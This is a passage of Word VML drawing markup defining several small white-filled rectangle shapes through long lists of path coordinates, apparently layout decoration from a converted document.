20,3973,12120,3972,12120,3971,12120,3970,12120,3968,12120,3967,12120,3966,12120,3965,12120,3963,12120,3962,12120,3960,12120,3959,12120,3957,12120,3956,12120,3954,12120,3952,12120,3951,12120,3949,12120,3947,12120,3946,12120,3944,12120,3942,12120,3940,12120,3938,12120,3936,12120,3934,12120,3932,12120,3930,12120,3928,12120,3925,12120,3923,12120,3921,12120,3919,12120,3916,12120,3914,12120,3911,12120,3909,12120,3906,12120,3904,12120,3901,12120,3898,12120,3895,12120,3893,12120,3890,12120,3887,12120,3884,12120,3881,12120,3881,12120,3881,12120,3881,12120,3881,12120,3881,12120,3881,12120,3881,12120,3881,12120,3881,12120,3881,12120,3881,12120,3881,12120,3881,12120,3881,12120,3881,12120,3881,12120,3881,12119,3881,12119,3881,12119,3881,12119,3881,12119,3881,12119,3881,12118,3881,12118,3881,12118,3881,12118,3881,12117,3881,12117,3881,12117,3881,12116,3881,12116,3881,12116,3881,12115,3881,12115,3881,12114,3881,12114,3881,12113,3881,12112,3881,12112,3881,12111,3881,12110,3881,12110,3881,12109,3881,12108,3881,12107,3881,12106,3881,12105,3881,12104,3881,12103,3881,12102,3881,12101,3881,12100,3881,12099,3881,12098,3881,12096,3881,12095,3881,12094,3881,12092,3881,12091,3881,12089,3881,12087,3881,12086,3881,12084,3881,12082,3881,12080,3881,12079,3881,12077,3881,12075,3881,12073,3881,12070,3881,12068,3881,12066,3881,12064,3881,12061,3881,12059,3881,12056,3881,12054,3881,12051,3881,12048,3881,12045,3881,12043,3881,12040,3881,12037,3881,12034,3881,12030,3881,12027,3881,12024,3881,12020,3881,12017,3881,12013,3881,12010,3881,12006,3881,12002,3881,11998,3881,11994,3881,11990,3881,11986,3881,11982,3881,11978,3881,11973,3881,11969,3881,11964,3881,11959,3881,11955,3881,11950,3881,11945,3881,11940,3881,11935,3881,11929,3881,11924,3881,11919,3881,11913,3881,11907,3881,11902,3881,11896,3881,11890,3881,11884,3881,11878,3881,11871,3881,11865e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:611.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,12230" coordsize="130,250">
        <v:shape style="position:absolute;left:2650;top:12230;width:130;height:250" coordorigin="2650,12230" coordsize="130,250" path="m2665,12240l2665,12240,2665,12240,2665,12240,2665,12240,2665,12240,2665,12240,2665,12240,2665,12240,2665,12240,2665,12240,2665,12240,2665,12240,2665,12240,2665,12240,2666,12240,2666,12240,2666,12240,2666,12240,2666,12240,2666,12240,2666,12240,2666,12240,2666,12240,2666,12240,2666,12240,2666,12240,2667,12240,2667,12240,2667,12240,2667,12240,2667,12240,2667,12240,2668,12240,2668,12240,2668,12240,2668,12240,2669,12240,2669,12240,2669,12240,2670,12240,2670,12240,2670,12240,2671,12240,2671,12240,2671,12240,2672,12240,2672,12240,2673,12240,2673,12240,2674,12240,2674,12240,2675,12240,2675,12240,2676,12240,2677,12240,2677,12240,2678,12240,2679,12240,2679,12240,2680,12240,2681,12240,2682,12240,2682,12240,2683,12240,2684,12240,2685,12240,2686,12240,2687,12240,2688,12240,2689,12240,2690,12240,2691,12240,2692,12240,2693,12240,2694,12240,2695,12240,2697,12240,2698,12240,2699,12240,2700,12240,2702,12240,2703,12240,2705,12240,2706,12240,2708,12240,2709,12240,2711,12240,2712,12240,2714,12240,2716,12240,2717,12240,2719,12240,2721,12240,2723,12240,2725,12240,2726,12240,2728,12240,2730,12240,2732,12240,2734,12240,2737,12240,2739,12240,2741,12240,2743,12240,2745,12240,2748,12240,2750,12240,2753,12240,2755,12240,2758,12240,2760,12240,2763,12240,2765,12240,2768,12240,2771,12240,2774,12240,2777,12240,2779,12240,2782,12240,2785,12240,2785,12240,2785,12240,2785,12240,2785,12240,2785,12240,2785,12240,2785,12240,2785,12240,2785,12240,2785,12240,2785,12240,2785,12240,2785,12240,2785,12241,2785,12241,2785,12241,2785,12241,2785,12241,2785,12241,2785,12241,2785,12241,2785,12242,2785,12242,2785,12242,2785,12242,2785,12243,2785,12243,2785,12243,2785,12243,2785,12244,2785,12244,2785,12245,2785,12245,2785,12246,2785,12246,2785,12247,2785,12247,2785,12248,2785,12248,2785,12249,2785,12250,2785,12251,2785,12251,2785,12252,2785,12253,2785,12254,2785,12255,2785,12256,2785,12257,2785,12258,2785,12259,2785,12260,2785,12261,2785,12263,2785,12264,2785,12265,2785,12267,2785,12268,2785,12270,2785,12271,2785,12273,2785,12275,2785,12276,2785,12278,2785,12280,2785,12282,2785,12284,2785,12286,2785,12288,2785,12290,2785,12292,2785,12294,2785,12297,2785,12299,2785,12302,2785,12304,2785,12307,2785,12309,2785,12312,2785,12315,2785,12318,2785,12321,2785,12324,2785,12327,2785,12330,2785,12333,2785,12336,2785,12340,2785,12343,2785,12347,2785,12351,2785,12354,2785,12358,2785,12362,2785,12366,2785,12370,2785,12374,2785,12378,2785,12383,2785,12387,2785,12392,2785,12396,2785,12401,2785,12406,2785,12410,2785,12415,2785,12420,2785,12426,2785,12431,2785,12436,2785,12442,2785,12447,2785,12453,2785,12459,2785,12464,2785,12470,2785,12476,2785,12483,2785,12489,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2785,12495,2784,12495,2784,12495,2784,12495,2784,12495,2784,12495,2784,12495,2783,12495,2783,12495,2783,12495,2783,12495,2783,12495,2782,12495,2782,12495,2782,12495,2781,12495,2781,12495,2781,12495,2780,12495,2780,12495,2780,12495,2779,12495,2779,12495,2778,12495,2778,12495,2778,12495,2777,12495,2776,12495,2776,12495,2775,12495,2775,12495,2774,12495,2774,12495,2773,12495,2772,12495,2772,12495,2771,12495,2770,12495,2769,12495,2768,12495,2768,12495,2767,12495,2766,12495,2765,12495,2764,12495,2763,12495,2762,12495,2761,12495,2760,12495,2759,12495,2758,12495,2757,12495,2755,12495,2754,12495,2753,12495,2752,12495,2750,12495,2749,12495,2748,12495,2746,12495,2745,12495,2743,12495,2742,12495,2740,12495,2738,12495,2737,12495,2735,12495,2733,12495,2732,12495,2730,12495,2728,12495,2726,12495,2724,12495,2722,12495,2720,12495,2718,12495,2716,12495,2714,12495,2712,12495,2710,12495,2708,12495,2705,12495,2703,12495,2701,12495,2698,12495,2696,12495,2693,12495,2691,12495,2688,12495,2685,12495,2683,12495,2680,12495,2677,12495,2674,12495,2671,12495,2668,12495,2665,12495,2665,12495,2665,12495,2665,12495,2665,12495,2665,12495,2665,12495,2665,12495,2665,12495,2665,12495,2665,12495,2665,12495,2665,12495,2665,12495,2665,12495,2665,12495,2665,12495,2665,12495,2665,12495,2665,12494,2665,12494,2665,12494,2665,12494,2665,12494,2665,12493,2665,12493,2665,12493,2665,12493,2665,12492,2665,12492,2665,12492,2665,12491,2665,12491,2665,12490,2665,12490,2665,12489,2665,12489,2665,12488,2665,12488,2665,12487,2665,12486,2665,12486,2665,12485,2665,12484,2665,12483,2665,12482,2665,12481,2665,12481,2665,12480,2665,12479,2665,12477,2665,12476,2665,12475,2665,12474,2665,12473,2665,12471,2665,12470,2665,12469,2665,12467,2665,12466,2665,12464,2665,12463,2665,12461,2665,12459,2665,12457,2665,12456,2665,12454,2665,12452,2665,12450,2665,12448,2665,12446,2665,12443,2665,12441,2665,12439,2665,12436,2665,12434,2665,12431,2665,12429,2665,12426,2665,12423,2665,12421,2665,12418,2665,12415,2665,12412,2665,12409,2665,12406,2665,12402,2665,12399,2665,12396,2665,12392,2665,12389,2665,12385,2665,12381,2665,12377,2665,12374,2665,12370,2665,12365,2665,12361,2665,12357,2665,12353,2665,12348,2665,12344,2665,12339,2665,12335,2665,12330,2665,12325,2665,12320,2665,12315,2665,12310,2665,12305,2665,12299,2665,12294,2665,12288,2665,12283,2665,12277,2665,12271,2665,12265,2665,12259,2665,12253,2665,12247,2665,12240e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:611.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,12230" coordsize="130,250">
        <v:shape style="position:absolute;left:3010;top:12230;width:130;height:250" coordorigin="3010,12230" coordsize="130,250" path="m3026,12240l3026,12240,3026,12240,3026,12240,3026,12240,3026,12240,3026,12240,3026,12240,3026,12240,3026,12240,3026,12240,3026,12240,3026,12240,3026,12240,3026,12240,3026,12240,3026,12240,3026,12240,3026,12240,3026,12240,3026,12240,3026,12240,3026,12240,3026,12240,3026,12240,3027,12240,3027,12240,3027,12240,3027,12240,3027,12240,3027,12240,3027,12240,3028,12240,3028,12240,3028,12240,3028,12240,3029,12240,3029,12240,3029,12240,3029,12240,3030,12240,3030,12240,3030,12240,3031,12240,3031,12240,3032,12240,3032,12240,3032,12240,3033,12240,3033,12240,3034,12240,3034,12240,3035,12240,3036,12240,3036,12240,3037,12240,3037,12240,3038,12240,3039,12240,3039,12240,3040,12240,3041,12240,3042,12240,3043,12240,3043,12240,3044,12240,3045,12240,3046,12240,3047,12240,3048,12240,3049,12240,3050,12240,3051,12240,3052,12240,3053,12240,3054,12240,3056,12240,3057,12240,3058,12240,3059,12240,3061,12240,3062,12240,3063,12240,3065,12240,3066,12240,3068,12240,3069,12240,3071,12240,3072,12240,3074,12240,3076,12240,3077,12240,3079,12240,3081,12240,3083,12240,3085,12240,3087,12240,3089,12240,3091,12240,3093,12240,3095,12240,3097,12240,3099,12240,3101,12240,3103,12240,3106,12240,3108,12240,3110,12240,3113,12240,3115,12240,3118,12240,3120,12240,3123,12240,3126,12240,3128,12240,3131,12240,3134,12240,3137,12240,3140,12240,3143,12240,3146,12240,3146,12240,3146,12240,3146,12240,3146,12240,3146,12240,3146,12240,3146,12240,3146,12240,3146,12240,3146,12240,3146,12240,3146,12240,3146,12240,3146,12241,3146,12241,3146,12241,3146,12241,3146,12241,3146,12241,3146,12241,3146,12241,3146,12242,3146,12242,3146,12242,3146,12242,3146,12243,3146,12243,3146,12243,3146,12243,3146,12244,3146,12244,3146,12245,3146,12245,3146,12246,3146,12246,3146,12247,3146,12247,3146,12248,3146,12248,3146,12249,3146,12250,3146,12251,3146,12251,3146,12252,3146,12253,3146,12254,3146,12255,3146,12256,3146,12257,3146,12258,3146,12259,3146,12260,3146,12261,3146,12263,3146,12264,3146,12265,3146,12267,3146,12268,3146,12270,3146,12271,3146,12273,3146,12275,3146,12276,3146,12278,3146,12280,3146,12282,3146,12284,3146,12286,3146,12288,3146,12290,3146,12292,3146,12294,3146,12297,3146,12299,3146,12302,3146,12304,3146,12307,3146,12309,3146,12312,3146,12315,3146,12318,3146,12321,3146,12324,3146,12327,3146,12330,3146,12333,3146,12336,3146,12340,3146,12343,3146,12347,3146,12351,3146,12354,3146,12358,3146,12362,3146,12366,3146,12370,3146,12374,3146,12378,3146,12383,3146,12387,3146,12392,3146,12396,3146,12401,3146,12406,3146,12410,3146,12415,3146,12420,3146,12426,3146,12431,3146,12436,3146,12442,3146,12447,3146,12453,3146,12459,3146,12464,3146,12470,3146,12476,3146,12483,3146,12489,3146,12495,3146,12495,3146,12495,3146,12495,3146,12495,3146,12495,3146,12495,3146,12495,3146,12495,3146,12495,3146,12495,3146,12495,3145,12495,3145,12495,3145,12495,3145,12495,3145,12495,3145,12495,3145,12495,3145,12495,3145,12495,3145,12495,3145,12495,3145,12495,3145,12495,3145,12495,3144,12495,3144,12495,3144,12495,3144,12495,3144,12495,3144,12495,3143,12495,3143,12495,3143,12495,3143,12495,3143,12495,3142,12495,3142,12495,3142,12495,3141,12495,3141,12495,3141,12495,3140,12495,3140,12495,3140,12495,3139,12495,3139,12495,3138,12495,3138,12495,3137,12495,3137,12495,3136,12495,3136,12495,3135,12495,3134,12495,3134,12495,3133,12495,3132,12495,3132,12495,3131,12495,3130,12495,3129,12495,3129,12495,3128,12495,3127,12495,3126,12495,3125,12495,3124,12495,3123,12495,3122,12495,3121,12495,3120,12495,3119,12495,3118,12495,3117,12495,3116,12495,3114,12495,3113,12495,3112,12495,3110,12495,3109,12495,3108,12495,3106,12495,3105,12495,3103,12495,3102,12495,3100,12495,3099,12495,3097,12495,3095,12495,3094,12495,3092,12495,3090,12495,3088,12495,3086,12495,3084,12495,3083,12495,3081,12495,3079,12495,3076,12495,3074,12495,3072,12495,3070,12495,3068,12495,3065,12495,3063,12495,3061,12495,3058,12495,3056,12495,3053,12495,3051,12495,3048,12495,3045,12495,3043,12495,3040,12495,3037,12495,3034,12495,3031,12495,3029,12495,3026,12495,3026,12495,3026,12495,3026,12495,3026,12495,3026,12495,3026,12495,3026,12495,3026,12495,3026,12495,3026,12495,3026,12495,3026,12495,3026,12495,3026,12495,3026,12495,3026,12495,3026,12495,3026,12495,3026,12494,3026,12494,3026,12494,3026,12494,3026,12494,3026,12493,3026,12493,3026,12493,3026,12493,3026,12492,3026,12492,3026,12492,3026,12491,3026,12491,3026,12490,3026,12490,3026,12489,3026,12489,3026,12488,3026,12488,3026,12487,3026,12486,3026,12486,3026,12485,3026,12484,3026,12483,3026,12482,3026,12481,3026,12481,3026,12480,3026,12479,3026,12477,3026,12476,3026,12475,3026,12474,3026,12473,3026,12471,3026,12470,3026,12469,3026,12467,3026,12466,3026,12464,3026,12463,3026,12461,3026,12459,3026,12457,3026,12456,3026,12454,3026,12452,3026,12450,3026,12448,3026,12446,3026,12443,3026,12441,3026,12439,3026,12436,3026,12434,3026,12431,3026,12429,3026,12426,3026,12423,3026,12421,3026,12418,3026,12415,3026,12412,3026,12409,3026,12406,3026,12402,3026,12399,3026,12396,3026,12392,3026,12389,3026,12385,3026,12381,3026,12377,3026,12374,3026,12370,3026,12365,3026,12361,3026,12357,3026,12353,3026,12348,3026,12344,3026,12339,3026,12335,3026,12330,3026,12325,3026,12320,3026,12315,3026,12310,3026,12305,3026,12299,3026,12294,3026,12288,3026,12283,3026,12277,3026,12271,3026,12265,3026,12259,3026,12253,3026,12247,3026,12240e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:516.500pt;margin-top:611.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10330,12230" coordsize="130,250">
        <v:shape style="position:absolute;left:10330;top:12230;width:130;height:250" coordorigin="10330,12230" coordsize="130,250" path="m10349,12240l10349,12240,10349,12240,10349,12240,10349,12240,10349,12240,10349,12240,10349,12240,10349,12240,10349,12240,10349,12240,10349,12240,10349,12240,10349,12240,10349,12240,10349,12240,10349,12240,10350,12240,10350,12240,10350,12240,10350,12240,10350,12240,10350,12240,10350,12240,10350,12240,10350,12240,10350,12240,10350,12240,10351,12240,10351,12240,10351,12240,10351,12240,10351,12240,10352,12240,10352,12240,10352,12240,10352,12240,10353,12240,10353,12240,10353,12240,10353,12240,10354,12240,10354,12240,10354,12240,10355,12240,10355,12240,10356,12240,10356,12240,10357,12240,10357,12240,10358,12240,10358,12240,10359,12240,10359,12240,10360,12240,10360,12240,10361,12240,10362,12240,10362,12240,10363,12240,10364,12240,10365,12240,10365,12240,10366,12240,10367,12240,10368,12240,10369,12240,10370,12240,10371,12240,10372,12240,10373,12240,10374,12240,10375,12240,10376,12240,10377,12240,10378,12240,10379,12240,10380,12240,10382,12240,10383,12240,10384,12240,10386,12240,10387,12240,10388,12240,10390,12240,10391,12240,10393,12240,10395,12240,10396,12240,10398,12240,10399,12240,10401,12240,10403,12240,10405,12240,10407,12240,10408,12240,10410,12240,10412,12240,10414,12240,10416,12240,10418,12240,10420,12240,10423,12240,10425,12240,10427,12240,10429,12240,10432,12240,10434,12240,10436,12240,10439,12240,10441,12240,10444,12240,10447,12240,10449,12240,10452,12240,10455,12240,10458,12240,10460,12240,10463,12240,10466,12240,10469,12240,10469,12240,10469,12240,10469,12240,10469,12240,10469,12240,10469,12240,10469,12240,10469,12240,10469,12240,10469,12240,10469,12240,10469,12240,10469,12240,10469,12241,10469,12241,10469,12241,10469,12241,10469,12241,10469,12241,10469,12241,10469,12241,10469,12242,10469,12242,10469,12242,10469,12242,10469,12243,10469,12243,10469,12243,10469,12243,10469,12244,10469,12244,10469,12245,10469,12245,10469,12246,10469,12246,10469,12247,10469,12247,10469,12248,10469,12248,10469,12249,10469,12250,10469,12251,10469,12251,10469,12252,10469,12253,10469,12254,10469,12255,10469,12256,10469,12257,10469,12258,10469,12259,10469,12260,10469,12261,10469,12263,10469,12264,10469,12265,10469,12267,10469,12268,10469,12270,10469,12271,10469,12273,10469,12275,10469,12276,10469,12278,10469,12280,10469,12282,10469,12284,10469,12286,10469,12288,10469,12290,10469,12292,10469,12294,10469,12297,10469,12299,10469,12302,10469,12304,10469,12307,10469,12309,10469,12312,10469,12315,10469,12318,10469,12321,10469,12324,10469,12327,10469,12330,10469,12333,10469,12336,10469,12340,10469,12343,10469,12347,10469,12351,10469,12354,10469,12358,10469,12362,10469,12366,10469,12370,10469,12374,10469,12378,10469,12383,10469,12387,10469,12392,10469,12396,10469,12401,10469,12406,10469,12410,10469,12415,10469,12420,10469,12426,10469,12431,10469,12436,10469,12442,10469,12447,10469,12453,10469,12459,10469,12464,10469,12470,10469,12476,10469,12483,10469,12489,10469,12495,10469,12495,10469,12495,10469,12495,10469,12495,10469,12495,10469,12495,10469,12495,10469,12495,10469,12495,10469,12495,10469,12495,10469,12495,10469,12495,10469,12495,10469,12495,10469,12495,10469,12495,10469,12495,10469,12495,10469,12495,10469,12495,10469,12495,10469,12495,10468,12495,10468,12495,10468,12495,10468,12495,10468,12495,10468,12495,10468,12495,10467,12495,10467,12495,10467,12495,10467,12495,10466,12495,10466,12495,10466,12495,10466,12495,10465,12495,10465,12495,10465,12495,10464,12495,10464,12495,10464,12495,10463,12495,10463,12495,10462,12495,10462,12495,10461,12495,10461,12495,10460,12495,10460,12495,10459,12495,10459,12495,10458,12495,10457,12495,10457,12495,10456,12495,10455,12495,10455,12495,10454,12495,10453,12495,10452,12495,10451,12495,10451,12495,10450,12495,10449,12495,10448,12495,10447,12495,10446,12495,10445,12495,10444,12495,10443,12495,10442,12495,10440,12495,10439,12495,10438,12495,10437,12495,10435,12495,10434,12495,10433,12495,10431,12495,10430,12495,10429,12495,10427,12495,10426,12495,10424,12495,10422,12495,10421,12495,10419,12495,10417,12495,10416,12495,10414,12495,10412,12495,10410,12495,10408,12495,10406,12495,10404,12495,10402,12495,10400,12495,10398,12495,10396,12495,10394,12495,10391,12495,10389,12495,10387,12495,10384,12495,10382,12495,10380,12495,10377,12495,10374,12495,10372,12495,10369,12495,10366,12495,10364,12495,10361,12495,10358,12495,10355,12495,10352,12495,10349,12495,10349,12495,10349,12495,10349,12495,10349,12495,10349,12495,10349,12495,10349,12495,10349,12495,10349,12495,10349,12495,10349,12495,10349,12495,10349,12495,10349,12495,10349,12495,10349,12495,10349,12495,10349,12495,10349,12494,10349,12494,10349,12494,10349,12494,10349,12494,10349,12493,10349,12493,10349,12493,10349,12493,10349,12492,10349,12492,10349,12492,10349,12491,10349,12491,10349,12490,10349,12490,10349,12489,10349,12489,10349,12488,10349,12488,10349,12487,10349,12486,10349,12486,10349,12485,10349,12484,10349,12483,10349,12482,10349,12481,10349,12481,10349,12480,10349,12479,10349,12477,10349,12476,10349,12475,10349,12474,10349,12473,10349,12471,10349,12470,10349,12469,10349,12467,10349,12466,10349,12464,10349,12463,10349,12461,10349,12459,10349,12457,10349,12456,10349,12454,10349,12452,10349,12450,10349,12448,10349,12446,10349,12443,10349,12441,10349,12439,10349,12436,10349,12434,10349,12431,10349,12429,10349,12426,10349,12423,10349,12421,10349,12418,10349,12415,10349,12412,10349,12409,10349,12406,10349,12402,10349,12399,10349,12396,10349,12392,10349,12389,10349,12385,10349,12381,10349,12377,10349,12374,10349,12370,10349,12365,10349,12361,10349,12357,10349,12353,10349,12348,10349,12344,10349,12339,10349,12335,10349,12330,10349,12325,10349,12320,10349,12315,10349,12310,10349,12305,10349,12299,10349,12294,10349,12288,10349,12283,10349,12277,10349,12271,10349,12265,10349,12259,10349,12253,10349,12247,10349,12240e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:85.500pt;margin-top:624.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1710,12490" coordsize="130,270">
        <v:shape style="position:absolute;left:1710;top:12490;width:130;height:270" coordorigin="1710,12490" coordsize="130,270" path="m1720,12510l1720,12510,1720,12510,1720,12510,1720,12510,1720,12510,1720,12510,1720,12510,1720,12510,1720,12510,1720,12510,1720,12510,1720,12510,1720,12510,1720,12510,1720,12510,1720,12510,1720,12510,1720,12510,1720,12510,1720,12510,1720,12510,1721,12510,1721,12510,1721,12510,1721,12510,1721,12510,1721,12510,1721,12510,1721,12510,1722,12510,1722,12510,1722,12510,1722,12510,1722,12510,1723,12510,1723,12510,1723,12510,1723,12510,1724,12510,1724,12510,1724,12510,1725,12510,1725,12510,1726,12510,1726,12510,1726,12510,1727,12510,1727,12510,1728,12510,1728,12510,1729,12510,1729,12510,1730,12510,1730,12510,1731,12510,1732,12510,1732,12510,1733,12510,1734,12510,1734,12510,1735,12510,1736,12510,1737,12510,1738,12510,1739,12510,1739,12510,1740,12510,1741,12510,1742,12510,1743,12510,1744,12510,1745,12510,1746,12510,1748,12510,1749,12510,1750,12510,1751,12510,1752,12510,1754,12510,1755,12510,1756,12510,1758,12510,1759,12510,1761,12510,1762,12510,1764,12510,1765,12510,1767,12510,1768,12510,1770,12510,1772,12510,1774,12510,1775,12510,1777,12510,1779,12510,1781,12510,1783,12510,1785,12510,1787,12510,1789,12510,1791,12510,1793,12510,1795,12510,1798,12510,1800,12510,1802,12510,1805,12510,1807,12510,1810,12510,1812,12510,1815,12510,1817,12510,1820,12510,1823,12510,1825,12510,1828,12510,1831,12510,1834,12510,1837,12510,1840,12510,1840,12510,1840,12510,1840,12510,1840,12510,1840,12510,1840,12510,1840,12510,1840,12510,1840,12510,1840,12510,1840,12510,1840,12511,1840,12511,1840,12511,1840,12511,1840,12511,1840,12511,1840,12511,1840,12511,1840,12511,1840,12512,1840,12512,1840,12512,1840,12512,1840,12512,1840,12513,1840,12513,1840,12513,1840,12514,1840,12514,1840,12514,1840,12515,1840,12515,1840,12516,1840,12516,1840,12517,1840,12517,1840,12518,1840,12519,1840,12519,1840,12520,1840,12521,1840,12522,1840,12522,1840,12523,1840,12524,1840,12525,1840,12526,1840,12527,1840,12528,1840,12529,1840,12530,1840,12532,1840,12533,1840,12534,1840,12535,1840,12537,1840,12538,1840,12540,1840,12541,1840,12543,1840,12545,1840,12546,1840,12548,1840,12550,1840,12552,1840,12554,1840,12556,1840,12558,1840,12560,1840,12562,1840,12564,1840,12567,1840,12569,1840,12572,1840,12574,1840,12577,1840,12579,1840,12582,1840,12585,1840,12588,1840,12591,1840,12594,1840,12597,1840,12600,1840,12603,1840,12607,1840,12610,1840,12613,1840,12617,1840,12621,1840,12624,1840,12628,1840,12632,1840,12636,1840,12640,1840,12644,1840,12648,1840,12653,1840,12657,1840,12662,1840,12666,1840,12671,1840,12676,1840,12681,1840,12686,1840,12691,1840,12696,1840,12701,1840,12706,1840,12712,1840,12717,1840,12723,1840,12729,1840,12735,1840,12741,1840,12747,1840,12753,1840,12759,1840,12765,1840,12765,1840,12765,1840,12765,1840,12765,1840,12765,1840,12765,1840,12765,1840,12765,1840,12765,1840,12765,1840,12765,1840,12765,1840,12765,1840,12765,1840,12765,1840,12765,1840,12765,1840,12765,1840,12765,1839,12765,1839,12765,1839,12765,1839,12765,1839,12765,1839,12765,1839,12765,1839,12765,1839,12765,1838,12765,1838,12765,1838,12765,1838,12765,1838,12765,1837,12765,1837,12765,1837,12765,1837,12765,1836,12765,1836,12765,1836,12765,1835,12765,1835,12765,1835,12765,1834,12765,1834,12765,1833,12765,1833,12765,1833,12765,1832,12765,1832,12765,1831,12765,1830,12765,1830,12765,1829,12765,1829,12765,1828,12765,1827,12765,1827,12765,1826,12765,1825,12765,1825,12765,1824,12765,1823,12765,1822,12765,1821,12765,1820,12765,1819,12765,1818,12765,1818,12765,1817,12765,1815,12765,1814,12765,1813,12765,1812,12765,1811,12765,1810,12765,1809,12765,1807,12765,1806,12765,1805,12765,1803,12765,1802,12765,1801,12765,1799,12765,1798,12765,1796,12765,1795,12765,1793,12765,1791,12765,1790,12765,1788,12765,1786,12765,1784,12765,1783,12765,1781,12765,1779,12765,1777,12765,1775,12765,1773,12765,1771,12765,1769,12765,1767,12765,1764,12765,1762,12765,1760,12765,1757,12765,1755,12765,1753,12765,1750,12765,1748,12765,1745,12765,1742,12765,1740,12765,1737,12765,1734,12765,1732,12765,1729,12765,1726,12765,1723,12765,1720,12765,1720,12765,1720,12765,1720,12765,1720,12765,1720,12765,1720,12765,1720,12765,1720,12765,1720,12765,1720,12765,1720,12765,1720,12765,1720,12765,1720,12765,1720,12765,1720,12765,1720,12765,1720,12765,1720,12765,1720,12764,1720,12764,1720,12764,1720,12764,1720,12764,1720,12763,1720,12763,1720,12763,1720,12762,1720,12762,1720,12762,1720,12761,1720,12761,1720,12760,1720,12760,1720,12759,1720,12759,1720,12758,1720,12758,1720,12757,1720,12756,1720,12756,1720,12755,1720,12754,1720,12753,1720,12753,1720,12752,1720,12751,1720,12750,1720,12749,1720,12748,1720,12747,1720,12745,1720,12744,1720,12743,1720,12742,1720,12740,1720,12739,1720,12737,1720,12736,1720,12734,1720,12733,1720,12731,1720,12729,1720,12728,1720,12726,1720,12724,1720,12722,1720,12720,1720,12718,1720,12716,1720,12714,1720,12711,1720,12709,1720,12707,1720,12704,1720,12702,1720,12699,1720,12696,1720,12694,1720,12691,1720,12688,1720,12685,1720,12682,1720,12679,1720,12676,1720,12672,1720,12669,1720,12666,1720,12662,1720,12659,1720,12655,1720,12651,1720,12648,1720,12644,1720,12640,1720,12636,1720,12631,1720,12627,1720,12623,1720,12619,1720,12614,1720,12609,1720,12605,1720,12600,1720,12595,1720,12590,1720,12585,1720,12580,1720,12575,1720,12569,1720,12564,1720,12558,1720,12553,1720,12547,1720,12541,1720,12535,1720,12529,1720,12523,1720,12517,1720,12510e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:642.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,12850" coordsize="130,270">
        <v:shape style="position:absolute;left:2650;top:12850;width:130;height:270" coordorigin="2650,12850" coordsize="130,270" path="m2665,12870l2665,12870,2665,12870,2665,12870,2665,12870,2665,12870,2665,12870,2665,12870,2665,12870,2665,12870,2665,12870,2665,12870,2665,12870,2665,12870,2665,12870,2666,12870,2666,12870,2666,12870,2666,12870,2666,12870,2666,12870,2666,12870,2666,12870,2666,12870,2666,12870,2666,12870,2666,12870,2667,12870,2667,12870,2667,12870,2667,12870,2667,12870,2667,12870,2668,12870,2668,12870,2668,12870,2668,12870,2669,12870,2669,12870,2669,12870,2670,12870,2670,12870,2670,12870,2671,12870,2671,12870,2671,12870,2672,12870,2672,12870,2673,12870,2673,12870,2674,12870,2674,12870,2675,12870,2675,12870,2676,12870,2677,12870,2677,12870,2678,12870,2679,12870,2679,12870,2680,12870,2681,12870,2682,12870,2682,12870,2683,12870,2684,12870,2685,12870,2686,12870,2687,12870,2688,12870,2689,12870,2690,12870,2691,12870,2692,12870,2693,12870,2694,12870,2695,12870,2697,12870,2698,12870,2699,12870,2700,12870,2702,12870,2703,12870,2705,12870,2706,12870,2708,12870,2709,12870,2711,12870,2712,12870,2714,12870,2716,12870,2717,12870,2719,12870,2721,12870,2723,12870,2725,12870,2726,12870,2728,12870,2730,12870,2732,12870,2734,12870,2737,12870,2739,12870,2741,12870,2743,12870,2745,12870,2748,12870,2750,12870,2753,12870,2755,12870,2758,12870,2760,12870,2763,12870,2765,12870,2768,12870,2771,12870,2774,12870,2777,12870,2779,12870,2782,12870,2785,12870,2785,12870,2785,12870,2785,12870,2785,12870,2785,12870,2785,12871,2785,12871,2785,12871,2785,12871,2785,12871,2785,12871,2785,12871,2785,12871,2785,12871,2785,12871,2785,12871,2785,12871,2785,12871,2785,12871,2785,12872,2785,12872,2785,12872,2785,12872,2785,12872,2785,12873,2785,12873,2785,12873,2785,12873,2785,12874,2785,12874,2785,12875,2785,12875,2785,12875,2785,12876,2785,12876,2785,12877,2785,12878,2785,12878,2785,12879,2785,12879,2785,12880,2785,12881,2785,12882,2785,12883,2785,12883,2785,12884,2785,12885,2785,12886,2785,12887,2785,12888,2785,12889,2785,12891,2785,12892,2785,12893,2785,12894,2785,12896,2785,12897,2785,12899,2785,12900,2785,12902,2785,12903,2785,12905,2785,12907,2785,12908,2785,12910,2785,12912,2785,12914,2785,12916,2785,12918,2785,12920,2785,12922,2785,12925,2785,12927,2785,12929,2785,12932,2785,12934,2785,12937,2785,12940,2785,12942,2785,12945,2785,12948,2785,12951,2785,12954,2785,12957,2785,12960,2785,12963,2785,12967,2785,12970,2785,12974,2785,12977,2785,12981,2785,12985,2785,12988,2785,12992,2785